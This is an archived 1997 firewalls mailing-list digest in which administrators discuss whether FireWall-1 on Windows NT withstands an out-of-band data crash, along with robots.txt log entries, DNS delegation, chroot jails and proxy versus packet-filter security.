From: "Jim E. Crawford"
To: "'rabbi@www.valuu.net'", "'firewalls@GreatCircle.COM'"
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts
Date: Fri, 6 Jun 1997 08:49:30 -0500

Yes, but Checkpoint (Firewall-1) recommends only SP1....and I myself have experienced problems trying to run it with SP3.

Firewall-1 (inspection module) resides between the network and datalink layers anyway....so you can block it with the firewall before the OS even sees it.

Jim Crawford
Paranet
Technical Analyst

-----Original Message-----
From: rabbi@www.valuu.net [SMTP:rabbi@www.valuu.net]
Sent: Thursday, June 05, 1997 10:13 PM
To: 'firewalls@GreatCircle.COM'
Subject: FW: [FW1] Out of Band Data Attack against NT-Hosts

Microsoft has a fix for OOB which can only be applied after SP3 for NT4. Both SP3 and the OOB Fix are available at their FTP site.

Shalom
Rabbi

----------
From: Pete Vickers[SMTP:pvickers@adtranz-signal.co.uk]
Sent: Thursday, June 05, 1997 2:05 PM
To: Jyri Kaljundi; 'Bryan D.
Boyle'
Cc: firewalls@GreatCircle.COM
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts

I was under the impression that since FW-1 only supported several net i/f cards that they rewrote the drivers for these, and thus managed to get between the OS and the card h/w. [pls correct me if I'm wrong, this was only an assumption!]

Pete

----------
From: Bryan D. Boyle
Sent: 05 June 1997 13:46
To: Jyri Kaljundi
Cc: firewalls@GreatCircle.COM
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts

At 03:08 PM 6/5/97 +0300, you wrote:
>You mean you can crash an NT FW-1 by sending OOB data to it?!
>That's scary if it is true and should be addressed by Check Point ASAP!
>

It is a bogosity with NT and not with FW1. Can't be addressed by Checkpoint, since the OS is not in their control. They can only operate (or be as secure as) at the least common denominator level of the underlying OS.

>What I have always thought of FW-1 is that it operates at quite low level
>inside the OS kernel, that as long as you filter everything the network
>bugs in the OS don't really matter, as the packets never reach FW-1.

Nothing except MS code operates in the NT kernel. This problem is with what happens when you send oob data to a stack (MS) that is tightly integrated with the OS (FW1 runs on top of this stuff, not in it...) and the stack/OS interface and control mechanism itself is crap.

Of course, on UN*X systems, this is not the case. This is a signal example of the difference between designing for peer review of your security model and designing for what gets good trade publication reviews.

>
>If sending some bytes of data to FW1 crashes it and the OS, this
>combination (FW1+NT) should not be used as a firewall solution at all. May
>be someone from CP could explain, how much do the bugs in the OS matter
>once FW1 is installed.

If there is an overall architectural problem with NT as it is, then the OS bugs matter A LOT.
But, of course, those that say you can trust a black box solution since the vendors are trustworthy are quite quiet on this regard...

I would agree that you should ignore NT as an OS platform in a security solution right now. Just my opinion, $.02 US, etc.

Flames to /dev/null.
--
Bryan D. Boyle            | LOGICAL: bdboyle@att.com 201-386-8584
#include                  | VIRTUAL: http://www.access.digex.net/~bdboyle
AT&T Laboratories, Inc.   | PHYSICAL: Whippany, NJ
                          | HISTORICAL: HQ, 6th Battalion, Army of No. VA.
"What country can preserve its liberties, if its rulers are not warned
from time to time, that its people preserve the spirit of resistance?"
-Thomas Jefferson, 1787

From owner-firewalls-outgoing Fri Jun 6 09:58:51 1997
Message-Id: <199706060529.WAA15413@notesgw2.sybase.com>
To: "Conrad Minor"
Cc: "Jyri Kaljundi", "Bryan D.
Boyle", firewalls
From: Ryan Russell/SYBASE
Date: 5 Jun 97 22:35:51 EDT
Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts

If I may interject in this conversation for a moment...

Firewall-1 (and, understand, I'm used to FW1 on Solaris) gets first crack at the packets, decides if they meet whatever criteria, and then passes them on to the IP stack that comes with the OS. It doesn't replace the stack per se; it still relies on the native OS IP driver to route packets and such, but hooks the OS such that the FW1 kernel gets to look at the packet first.

On my Firewall-1 machine, I've got the rules set so that no one is allowed to connect to the firewall machine, i.e. drop all packets with a destination address of the firewall itself. Now, it looks like the NT box in question did not have such a rule, so port 139 was "exposed." There may have been a reason for this, or it may have been oversight, or it may be a limitation of the FW1 implementation on NT, I don't know. I do, however, think it's an extraordinarily bad idea.

Ryan

---------- Previous Message ----------
To: jk, bdboyle
cc: firewalls
From: minorc @ reston.ans.net ("Conrad Minor") @ smtp
Date: 06/05/97 01:39:32 PM
Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts

All,

This of course doesn't address the problem with the FW1. It is just to refute the notion that NT is a completely closed OS.

Any firewall worth its salt won't be running the native NT stack unmodified. How, for example, would you plumb something like stateful inspection onto an NT box without kernel changes?

There are several methods of modifying the stack to harden it against attack or change the way it operates. The first would be to shim the stack, i.e. putting a driver between the Ethernet card drivers and the stack itself. NT has built-in support for this. Just read the DDK documentation.
NT 4.0 has even better support than 3.51, since Msoft has added calls that let you dynamically hook into the NDIS stuff. This is in fact how RAS is implemented (NDISWAN).

Another option of course is to replace the TCP stack altogether. Centri from Global Internet does that. Check out their web page. They completely bypass the Microsoft stack by building their own proprietary stack which intercepts all packets coming to the firewall. They optionally will pass packets to the Msoft stack depending on how your rules are configured.

Packet filter firewalls don't even need a TCP stack. Just hooks into the NDIS routines that handle the reception and distribution of packets. Probably could do this with another SHIM.

All of this is documented by Microsoft. The source code for sample drivers is available as part of the DDK. While there are no sample SHIM drivers, a buddy and I created one for NT 3.51 in about a month. It was really a matter of combining an existing ethernet driver with an existing protocol driver and making them talk to each other. NT even has source level debugging at the kernel layer. Name some UNIX boxes that support that (not to suggest that one is better than the other, just that NT kernel work is easier. Streams are pretty damn elegant).

Conrad

----------
> From: Bryan D. Boyle
> To: Jyri Kaljundi
> Cc: firewalls@greatcircle.com
> Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts
> Date: Thursday, June 05, 1997 9:46 AM
>
> At 03:08 PM 6/5/97 +0300, you wrote:
>
> >You mean you can crash an NT FW-1 by sending OOB data to it?!
> >That's scary if it is true and should be addressed by Check Point ASAP!
> >
>
> It is a bogosity with NT and not with FW1. Can't be addressed by Checkpoint,
> since the OS is not in their control. They can only operate (or be as
> secure as) at the least common denominator level of the underlying OS.
>
> >What I have always thought of FW-1 is that it operates at quite low level
> >inside the OS kernel, that as long as you filter everything the network
> >bugs in the OS don't really matter, as the packets never reach FW-1.
>
> Nothing except MS code operates in the NT kernel. This problem is with
> what happens when you send oob data to a stack (MS) that is tightly integrated
> with the OS (FW1 runs on top of this stuff, not in it...) and the stack/OS
> interface and control mechanism itself is crap.
>
> Of course, on UN*X systems, this is not the case. This is a signal example
> of the difference between designing for peer review of your security model
> and designing for what gets good trade publication reviews.
>
> >
> >If sending some bytes of data to FW1 crashes it and the OS, this
> >combination (FW1+NT) should not be used as a firewall solution at all. May
> >be someone from CP could explain, how much do the bugs in the OS matter
> >once FW1 is installed.
>
> If there is an overall architectural problem with NT as it is, then the OS
> bugs matter A LOT. But, of course, those that say you can trust a black box
> solution since the vendors are trustworthy are quite quiet on this regard...
>
> I would agree that you should ignore NT as an OS platform in a
> security solution right now. Just my opinion, $.02 US, etc.
>
> Flames to /dev/null.
> --
> Bryan D. Boyle            | LOGICAL: bdboyle@att.com 201-386-8584
> #include                  | VIRTUAL: http://www.access.digex.net/~bdboyle
> AT&T Laboratories, Inc.   | PHYSICAL: Whippany, NJ
>                           | HISTORICAL: HQ, 6th Battalion, Army of No. VA.
> "What country can preserve its liberties, if its rulers are not warned
> from time to time, that its people preserve the spirit of resistance?"
> -Thomas Jefferson, 1787

From owner-firewalls-outgoing Fri Jun 6 10:25:02 1997
From: ArkanoiD
Message-Id: <199706061605.UAA04862@paranoid.convey.ru>
Subject: Re: Secure Telnet!
To: snajdr@pvt.net (Petr Snajdr)
Date: Fri, 6 Jun 1997 20:05:06 +0400 (MSD)
Cc: vin@shore.net, firewalls@GreatCircle.COM
In-Reply-To: <33967557.62C80DFD@pvt.net> from "Petr Snajdr" at Jun 5, 97 10:14:15 am

nuqneH,

> There are 2 snapshots:
>
> ftp://hotline.pvt.net/pub/win_utils/winsock/ssh/ssh.gif

So it does not support TIS authentication?

--
_ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one!
From owner-firewalls-outgoing Fri Jun 6 10:31:22 1997
Date: Fri, 6 Jun 1997 11:06:29 -0500 (CDT)
From: Ken Hardy
Message-Id: <199706061606.LAA14579@binki.bridge.com>
To: kfrisco@shrike.depaul.edu
Subject: Re: nt web server log
Cc: firewalls@greatcircle.com

See http://info.webcrawler.com/mak/projects/robots/norobots.html

----- Begin Included Message -----

Date: Fri, 6 Jun 1997 10:35:22 -0500 (CDT)
From: "k. frisco"
To: firewalls@GreatCircle.COM
Subject: nt web server log

With all the talk about hacking webservers, I was wondering if anyone knows anything about a weird log msg that we got on our NT webserver? It was a GET to robots.txt.

There is no file or image that is related to this file name on our web page. Could not even find it on the server anywhere. Am I unduly concerned?
----- End Included Message ----- From owner-firewalls-outgoing Fri Jun 6 10:43:17 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA02842 for firewalls-outgoing; Fri, 6 Jun 1997 09:28:21 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA01362 for ; Fri, 6 Jun 1997 09:18:12 -0700 (PDT) Received: from services.state.mo.us (services.state.mo.us [168.166.2.67]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id JAA05218 for ; Fri, 6 Jun 1997 09:23:52 -0700 (PDT) Received: from services (services [168.166.2.67]) by services.state.mo.us (8.8.3/8.8.0) with SMTP id LAA05941; Fri, 6 Jun 1997 11:21:19 -0500 (CDT) Date: Fri, 6 Jun 1997 11:21:19 -0500 (CDT) From: James Proffer X-Sender: james@services To: "k. frisco" cc: firewalls@GreatCircle.COM Subject: Re: nt web server log In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The file robots.txt holds any robot exclusion rules you might care to write for your web server. Most (but not all) web spiders look for /robots.txt and obey its exclusions. On Fri, 6 Jun 1997, k. frisco wrote: > Withh all the talk about hacking webservers, I was wondering if anyone > knows anything about a weird log msg that we got on our nt webserver? it > was a get to robots.txt > > There is no file or image that is related to this file name on our web > page. Could not even find it on the server anywhere. Am I unduly > concerned? 
>

--
Missouri State Data Center <*> James Proffer: UNIX sysadm
Missouri Government Information | mailto:james@mail.state.mo.us
for the citizens of Missouri | http://www.state.mo.us/server.shtml
and the citizens of the world | (573) 751-1544 Fax: (573) 751-3299

From owner-firewalls-outgoing Fri Jun 6 11:01:11 1997
Date: Fri, 6 Jun 1997 12:55:40 -0400 (EDT)
From: Jeremy Zawodny
To: "k. frisco"
Cc: firewalls@GreatCircle.COM
Subject: Re: nt web server log

On Fri, 6 Jun 1997, k. frisco wrote:

> With all the talk about hacking webservers, I was wondering if anyone
> knows anything about a weird log msg that we got on our nt webserver? It
> was a get to robots.txt

It's nothing to worry about. See for more info about the robots.txt file.

Jeremy
---
Jeremy D. Zawodny
WCNet Technical Geek & Web Stuff
CRACK DES NOW!!!

From owner-firewalls-outgoing Fri Jun 6 11:15:21 1997
From: Vinod Valloppillil
To: "'k. frisco'", firewalls@greatcircle.com
Subject: RE: nt web server log
Date: Fri, 6 Jun 1997 09:40:37 -0700

Web crawlers (altavista, hotbot, etc.) have a convention to look for a
robots.txt file on a website before crawling the site. robots.txt is
supposed to document which URL trees (if any) the site admin does /
doesn't want to get crawled.

> -----Original Message-----
> From: k. frisco [SMTP:kfrisco@shrike.depaul.edu]
> Sent: Friday, June 06, 1997 8:35 AM
> To: firewalls@greatcircle.com
> Subject: nt web server log
>
> With all the talk about hacking webservers, I was wondering if anyone
> knows anything about a weird log msg that we got on our nt webserver? It
> was a get to robots.txt
>
> There is no file or image that is related to this file name on our web
> page. Could not even find it on the server anywhere. Am I unduly
> concerned?

From owner-firewalls-outgoing Fri Jun 6 11:20:07 1997
From: Eric Schult
Message-Id: <199706061644.MAA15491@oberon.qa.mvision.com>
Subject: Re: nt web server log
To: kfrisco@shrike.depaul.edu (k. frisco)
Date: Fri, 6 Jun 1997 12:44:08 -0400 (EDT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: from "k. frisco" at Jun 6, 97 10:35:22 am
Reply-To: Eric Schult

k. frisco writes:

> With all the talk about hacking webservers, I was wondering if anyone
> knows anything about a weird log msg that we got on our nt webserver? It
> was a get to robots.txt
> There is no file or image that is related to this file name on our web
> page. Could not even find it on the server anywhere. Am I unduly
> concerned?

No, don't be concerned. Many (well behaved) web indexers (and other
"robots") will look for this file, which may contain instructions to NOT
index a particular site.

I don't know what you'd put in it, I only know that its use is not a
threat.

--
Eric Schult E-Mail: eric.schult@mvision.com
Bridge Network Integration Services
40 Rector Street NYC 10006
1-212-306-0357

From owner-firewalls-outgoing Fri Jun 6 11:55:30 1997
Date: Fri, 6 Jun 1997 11:34:51 -0500 (CDT)
From: Brian Hatch
To: "k. frisco"
Cc: firewalls@GreatCircle.COM
Subject: Re: nt web server log

-----BEGIN PGP SIGNED MESSAGE-----

(Hi Karen -- long time no see!)

+ With all the talk about hacking webservers, I was wondering if anyone
+ knows anything about a weird log msg that we got on our nt webserver? It
+ was a get to robots.txt
+
+ There is no file or image that is related to this file name on our web
+ page. Could not even find it on the server anywhere. Am I unduly
+ concerned?

Not in the least. Many web spiders, search engines, etc will look for a
file http://machine/robots.txt on any web server it is going to index.
Some engines will not index any content on a server which has this file,
whereas others will use it to determine what to index and what to ignore.

So, it sounds like someone (potentially you) told such an engine to index
your site, and it was just being polite before doing so.

Bri

__
Brian Hatch, bri@ifokr.org          "Strange that if you cut off part of a
Systems and Security Engineer       chromosome, you get a boy, and if you
Onsight, Inc. http://www.avue.com/  cut off part of a boy you get a girl."

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBM5g8H6wnNhOoR921AQGbEwP+O12vaOJDLldwFv758zf3gL8JBVUBS9WV
0ba4JTSYL7c7EqZl54HJHn3gh6rio+ntlF0RagE+BMTOB6FwEoOZq8+uUK/vAV28
0Se4ofR9u+wZxxyhi8cD73poOezR0t4+lnn2mmVcc0SZU/I6vWa9CLCbUw8N6yNa
vqboII9IoDA=
=/Odg
-----END PGP SIGNATURE-----

From owner-firewalls-outgoing Fri Jun 6 11:57:44 1997
Message-ID: <33983FF5.5545B065@us.checkpoint.com>
Date: Fri, 06 Jun 1997 09:51:01 -0700
From: Brian Connolly
Reply-To: brian@us.checkpoint.com
Organization: Check Point Software Technologies
To: Ryan Russell/SYBASE
CC: Conrad Minor, Jyri Kaljundi, "Bryan D. Boyle", firewalls
Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts
References: <199706060529.WAA15413@notesgw2.sybase.com>

I'd like to take this opportunity to clarify some points and some
misconceptions about what is going on here:

(1) FireWall-1 does indeed intercept all network traffic as it leaves the
NIC driver, and *before* it gets to the TCP/IP stack, thus hardening the
stack against various attacks. FW-1 only passes traffic to the native
TCP/IP stack after it passes the stateful inspection engine and the
security policy installed on it.

(2) FireWall-1 *does* drop all IP packets with IP options set, though it
doesn't matter in this scenario since we're talking about TCP options. As
correctly stated by others, OOB is a useful feature in TCP that should not
be blocked for many applications.

(3) Only one person claimed to have performed this OOB attack on a
FireWall-1 machine successfully: Daniel Strawson. In a private email
correspondence with me, he corrected himself, saying that the only way it
happened was because he was letting *all* traffic through, unchecked.

First, I would recommend to all FireWall-1 customers to not allow NetBIOS
traffic into the firewall unless it was absolutely necessary. By letting
the firewall block NetBIOS (as it would by default), the problem would
have been avoided.

Secondly, (if you *really* want to use NETBIOS) I would avoid letting
these NETBIOS protocols through the firewall until it has been clarified
that the latest service patch *does* fix the problem with the NT TCP/IP
stack - for the meantime, let FireWall-1 drop the packets before it gets
there. We'll be performing some tests here today in our lab on this, and
I'll update the list as to our findings.

Below is Daniel's mail:

- Brian

---
Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts
Date: Fri, 6 Jun 1997 08:58:00 +0100 (BST)
From: Daniel Strawson
To: Brian Connolly

Brian -

As I've already said to the list (the server is a bit slow so you may not
have had it yet), I was mistaken. We had the rule as 'Any Any Any Accept',
so (obviously) as the attack does not set an IP header option, but a TCP
header option, FW-1 will allow the packets through.

Cheers,

Daniel

On Thu, 5 Jun 1997, Brian Connolly wrote:

> Daniel:
>
> I'm interested in repeating your crashing of a FireWall-1 system. Please
> tell me how you had it configured:
>
> * was the firewall set up to reject this specific traffic, or allow it?
> * what port did you send it to?
> * what program did you use to send the OOB data?
> * what version of FW-1 were you using?
>
> Thanks,
>
> Brian

Ryan Russell/SYBASE wrote:

> If I may interject in this conversation for a moment...
>
> Firewall-1 (and, understand I'm used to FW1 on solaris)
> gets first crack at the packets, decides if they meet whatever
> criteria, and then passes them on to the IP stack that comes
> with the OS. It doesn't replace the stack per se, it still relies on
> the native OS IP driver to route packets and such, but hooks the OS
> such that the FW1 kernel gets to look at the packet first.
>
> On my firewall-1 machine, I've got the rules set so that no one
> is allowed to connect to the firewall machine, i.e. drop all packets
> with a destination address of the firewall itself.
>
> Now, it looks like the NT box in question did not have such a rule,
> so port 139 was "exposed." There may have been a reason for
> this, or it may have been oversight, or it may be a limitation of the
> FW1 implementation on NT, I don't know.
>
> I do, however, think it's an extraordinarily bad idea.
>
> Ryan
>
> ---------- Previous Message ----------
> To: jk, bdboyle
> cc: firewalls
> From: minorc @ reston.ans.net ("Conrad Minor") @ smtp
> Date: 06/05/97 01:39:32 PM
> Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts
>
> All,
>
> This of course doesn't address the problem with the FW1. It is just to
> refute the notion that NT is a completely closed OS.
>
> Any firewall worth its salt won't be running the native NT stack
> unmodified. How for example would you plumb something like stateful
> inspection onto an NT box without kernel changes? There are several
> methods of modifying the stack to harden it against attack or change the
> way it operates. The first would be to shim the stack ie putting a driver
> between the Ethernet card drivers and the stack itself. NT has built in
> support for this. Just read the DDK documentation. NT 4.0 has even better
> support than 3.51 since Msoft has added calls that let you dynamically
> hook into the NDIS stuff. This is in fact how RAS is implemented (NDISWAN).
>
> Another option of course is to replace the TCP stack all together. Centri
> from Global Internet does that. Check out their web page. They completely
> bypass the microsoft stack by building their own proprietary stack which
> intercepts all packets coming to the firewall. They optionally will pass
> packets to the Msoft stack depending on how your rules are configured.
>
> Packet filter firewalls don't even need a TCP stack. Just hooks into the
> NDIS routines that handle the reception and distribution of packets.
> Probably could do this with another SHIM.
>
> All of this is documented by Microsoft. The source code for sample drivers
> is available as part of the DDK. While there are no sample SHIM drivers, a
> buddy and I created one for NT3.51 in about a month. It was really a matter
> of combining an existing ethernet driver with an existing protocol driver
> and making them talk to each other.
>
> NT even has source level debugging at the kernel layer. Name some UNIX
> boxes that support that (not to suggest that one is better than the other,
> just that NT kernel work is easier. Streams are pretty damn elegant).
>
> Conrad
> ----------
> > From: Bryan D. Boyle
> > To: Jyri Kaljundi
> > Cc: firewalls@greatcircle.com
> > Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts
> > Date: Thursday, June 05, 1997 9:46 AM
> >
> > At 03:08 PM 6/5/97 +0300, you wrote:
> >
> > >You mean you can crash an NT FW-1 by sending OOB data to it?!
> > >That's scary if it is true and should be addressed by Check Point ASAP!
> >
> > It is a bogosity with NT and not with FW1. Can't be addressed by
> > Checkpoint, since the OS is not in their control. They can only operate
> > (or be as secure as) at the least common denominator level of the
> > underlying OS.
> >
> > >What I have always thought of FW-1 is that it operates at quite low level
> > >inside the OS kernel, that as long as you filter everything the network
> > >bugs in the OS don't really matter, as the packets never reach FW-1.
> >
> > Nothing except MS code operates in the NT kernel. This problem is with
> > what happens when you send oob data to a stack (MS) that is tightly
> > integrated with the OS (FW1 runs on top of this stuff, not in it...) and
> > the stack/OS interface and control mechanism itself is crap.
> >
> > Of course, on UN*X systems, this is not the case. This is a signal example
> > of the difference between designing for peer review of your security model
> > and designing for what gets good trade publication reviews.
> >
> > >If sending some bytes of data to FW1 crashes it and the OS, this
> > >combination (FW1+NT) should not be used as a firewall solution at all. May
> > >be someone from CP could explain, how much do the bugs in the OS matter
> > >once FW1 is installed.
> >
> > If there is an overall architectural problem with NT as it is, then the OS
> > bugs matter A LOT. But, of course, those that say you can trust a black box
> > solution since the vendors are trustworthy are quite quiet on this regard...
> >
> > I would agree that you should ignore NT as an OS platform in a
> > security solution right now. Just my opinion, $.02 US, etc.
> >
> > Flames to /dev/null.
> > --
> > Bryan D. Boyle | LOGICAL: bdboyle@att.com 201-386-8584
> > #include | VIRTUAL: http://www.access.digex.net/~bdboyle
> > AT&T Laboratories, Inc. | PHYSICAL: Whippany, NJ
> > | HISTORICAL: HQ, 6th Battalion, Army of No. VA.
> > "What country can preserve its liberties, if its rulers are not warned
> > from time to time, that its people preserve the spirit of resistance?"
> > -Thomas Jefferson, 1787

--
===================================================================
Brian Connolly brian@us.checkpoint.com
Business Development Engineer 415.562.0400, ext 252
Check Point Software Technologies fax 415.562.0410

From owner-firewalls-outgoing Fri Jun 6 12:47:39 1997
Date: Fri, 06 Jun 1997 10:11:35 -0700
From: Bill Stout
Subject: RE: PIX and Firewall-1
To: Eric Vyncke, Bill Stout
Cc: firewalls@GreatCircle.COM
Message-Id: <2.2.32.19970606171135.00970908@vaxf.pios.com>

At 09:54 AM 6/6/97 +0000, Eric Vyncke wrote:
>Cannot resist replying :-) Beware that I'm working for Cisco Systems ;-)

>I'm stopping now because it is coming too commercial on
>a technical list.

Kudos to you! Greatness has been displayed here by Cisco.

>But, once again: the PIX is a secure and performant component
>of most security architecture.

Bill Stout

From owner-firewalls-outgoing Fri Jun 6 13:02:19 1997
Date: Fri, 6 Jun 1997 15:10:39 -0400 (EDT)
From: Neil Readwin
To: Ian Miller
cc: firewalls@greatcircle.com
Subject: Re: Unknown log entry...
In-Reply-To: <199706060838.JAA03645@h01.scientia.com>

On Fri, 6 Jun 1997, Ian Miller wrote:
> I have no idea why this DNS is set-up this.

According to page 191 of "DNS & Bind" it is an easy way to delegate
in-addr when you are subnetting. The alternative is to list NS records for
each address - if the subnets are 208.196.3.{0,64} then they would list 128
NS records pointing to 2 servers each serving 64 zones each containing 1
in-addr.arpa record. That would be ugly. At least the forward and backward
pointers for chessclub.com match up :-)

> >Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for
> >"66.3.196.208.in-addr.arpa IN PTR", got type "CNAME"

My reading of the book implies that this is a DNS server bug. However, I am
certainly no expert in this area. Neil.

From owner-firewalls-outgoing Fri Jun 6 13:13:47 1997
Date: Fri, 6 Jun 1997 15:15:02 -0400 (EDT)
From: Joe Klemmer
Reply-To: klemmerj@webtrek.com
cc: firewalls@GreatCircle.COM
Subject: Re: nt web server log
In-Reply-To: <199706061644.MAA15491@oberon.qa.mvision.com>

On Fri, 6 Jun 1997, Eric Schult wrote:

> > There is no file or image that is related to this file name on our web
> > page.
> > Could not even find it on the server anywhere. Am I unduly
> > concerned?
>
> No, don't be concerned. Many (well behaved) web indexers (and other "robots")
> will look for this file, which may contain instructions to NOT index
> a particular site.
>
> I don't know what you'd put in it, I only know that its use is not
> a threat.

It may not be a direct threat but it can be an indirect one. There was a
very good article last year about how not using robots.txt in some cases
can bring your system to a crawling halt. I believe the article was in Web
Techniques and it told how one web site was completely swamped by requests
from the crawlers that it forced the CPU usage up to near 100% and thus
made the site inaccessible. It was not an attack or anything but it had
the same effect as a Denial of Service attack.

---
"It's a damn poor mind that can only think of one way to spell a word."
-- Andrew Jackson

From owner-firewalls-outgoing Fri Jun 6 13:16:07 1997
Message-Id: <3.0.1.32.19970606161237.027a2968@squirrel>
Date: Fri, 06 Jun 1997 16:12:37 -0400
To: "Paquette, Trevor", "'Walczak, Joe'"
From: Ian Poynter
Subject: RE: ISP Connection

At 12:01 AM 6/5/97 -0600, Paquette, Trevor wrote:
>There are companies (mine included) that do manage firewalls for
>other companies, and we do a pretty damn good job at it. Our clients
>TRUST us to do it for them. WE are the ones on the hook for any
>break-ins and possible damage resulting from any outside
>security incidents.

I agree that whether to outsource firewall management (or anything else
for that matter) is not a black and white issue. Trust, most of it
subjectively evaluated, has a lot to do with how these decisions get made.

However what I'm curious about is whether mcc.net is really completely "on
the hook" in this situation. BBN's SitePatrol, for example, comes with an
extensive indemnification clause in its agreements ("if you're broken
into, we're not liable"). Are you saying that mcc.net doesn't have one of
these clauses in their agreements?

Of course, one always has the recourse to discontinue doing business with
an outsourcer at any time, including after a break-in.

Curiously,
Ian

-----
Ian Poynter ian@jerboa.com
Jerboa, Inc. +1-617-492-8084
PO Box 382648, Cambridge, MA 02238 http://www.jerboa.com
Providing unbiased Internet consulting for businesses.
PGP Fingerprint: BA 0C 82 C5 F2 03 3D 95 7C CE FD D3 57 4E 15 73

From owner-firewalls-outgoing Fri Jun 6 13:30:33 1997
Date: Fri, 6 Jun 1997 13:36:58 -0400
Message-Id: <9706061736.AA23445@cardinal>
To: firewalls@GreatCircle.COM
From: Mario Biron
Subject: TELNET AND FTP JAIL

Hi,

I have a Linux RedHat 4.2 and want to set up a kind of "jail" system for
the telnet and ftp login for some users. I want these users to be able to
telnet or ftp to their account but I don't want them to be able to see
anything else on the system. I think I have figured out the minimal files
to have a skeleton access but I don't know how to apply it to certain
users (a chroot I think, but how and where).

If you know of a practical solution, please let me know.

Thanks!

******************************************************************************
Mario Biron, Administrateur de Systemes
Almerco Inc.
-- http://www.almerco.ca
1695 Atmec unit 8, Gatineau (819) 669-3170

From owner-firewalls-outgoing Fri Jun 6 14:15:06 1997
Message-Id: <199706061830.NAA23824@badger.heurikon.com>
To: ryan.russell@sybase.com
cc: firewalls@greatcircle.com
Subject: relative security of Proxies vs. SPFs
Date: Fri, 06 Jun 1997 13:30:43 CDT
From: John Stewart

ryan.russell@sybase.com said (at http://futon.sfsu.edu/~rrussell/spfvprox.htm):

> So why do I claim the SPF can be more secure than proxies? Again, I
> emphasize can. Let me start with the converse: If you are only going
> to allow a single protocol through, even if you don't want to filter
> or validate the data in any meaningful way, get a good proxy. It
> should provide better security than a SPF.

> So here's my argument: Before, I gave an example of a bad proxy, it
> had a bug (unexpected behavior, bad design, to simplify, I'm going to
> call it a bug.) Ok, so SPFs can have bugs too, right? Sure. So, now
> you have to "proxy" two protocols. You still don't want to do any
> special filtering, just pass it through. So, let's assume that
> proxies have one bug each, as do SPFs.
> So, we have one SPF and two
> proxies. One bug with the SPF and two for the proxies. Do you see
> where I'm heading with this? If you want to pass n protocols, you
> have n bugs with proxies, 1 with the SPF. Or another way to think of
> it, the proxies will be (collectively) 1/n as secure as the SPF.

I'm not by any means an expert on the subject (or on firewalls in
general), but I must beg to differ with your reasoning...

A Stateful Packet Filter (SPF), in order to deal with a specific protocol
(telnet, http, ftp, etc...), has to have a specific ruleset to deal with
that protocol, correct? Therefore, shouldn't we assume a bug in each of the
protocol rulesets rather than in the SPF as a whole? Then we'd have two
bugs in the SPFs vs. two proxies with one bug each. Given this, and your
previous arguments, they work out to be the same security-wise, although I
also don't think that the overall security of the product is fairly
evaluated by merely assuming 1 bug per section of code.

If you're going to use this line of reasoning, you should at least factor
in the relative probability of a bug occurring based on the complexity of
the code (how does proxy code compare in complexity to SPF rules?) *AND*
the probability that a random bug will compromise security (I'm inclined
to believe that an SPF ruleset is much more likely to fail-open than an
equivalent proxy).
johnS

From owner-firewalls-outgoing Fri Jun 6 14:17:35 1997
In-Reply-To: <199706061350.JAA12541@homeport.org>
References: Conversation <3.0.1.16.19970605220043.356f0950@mail-hub> with last message <199706061350.JAA12541@homeport.org>
To: "Adam Shostack", "Ken Gunther"
Cc: "Firewalls Mailing List"
From: "Mariko Yashada"
Subject: Re: Does Winframe need a firewall?
Date: Fri, 06 Jun 97 14:33:21 PDT

I have worked with IBM's Global Network, specifically the Advantis
SecureNet. Access to resources on the network (web servers, mainframe
hosts, whatever) is controlled by RACF ACLs. The user connects to the
network and logs in using an IBM client. If the ACL for the resource has
an entry for you, you will be able to access it. If not, you won't know
it's there. I don't know if this is done by controlling routing tables or
what. So unless you have an IGN account and I have authorized your access
to my resource you won't be able to see the resource, unless you can hack
RACF or the routers.

There is an option to encrypt data traveling within the Network. The
connection between the Network and the client is also encrypted. I don't
recall what level of encryption is used though.
If one of our clients who has access to our server on IGN is capable of getting into it, there's not much we could do to stop them. We don't have a firewall in front of the server - http and ftp (GET only) are the only services enabled. Its not connected to any other network though. I ---------- > If I get an account on IGN, what prevents me from attacking your > Winframe box? Do you trust Citrix to have gotten all their security > right? What can I gain once I've broken it? (Hints; does it > strongly* encrypt passwords as they go over the net? Does it resist > password guessing attacks? Session hijacking?) > > *For explanations of strong encryption, see the Snake Oil Crypto FAQ. > > http://www.research.megasoft.com/people/cmcurtin/snake-oil-faq.html > > Adam > > Ken Gunther wrote: > | We are currently using Winframe by Citrix to give remote users access to > | applications at our datacenter. Access to the Winframe box is through the > | IBM Global Network (IGN). IGN is a subscribers only network. It is not as > | open as the Internet but by no means do we have control over who is on it. > | > | We currently have a firewall in front of the Winframe box but there is a > | noticable delay in keystrokes when going through the firewall (TIS Toolkit > | on a Linux box). We have performed some tests where for short periods of > | time the Winframe box was connected directly to the IGN and the keystroke > | delays went away. > | > | Is Winframe safe to put directly on the untrusted network? We are > worried > | about unauthorized people getting through to the trusted side as well as > | denial of service attacks where people try to crash Winframe. > > > -- > "It is seldom that liberty of any kind is lost all at once." 
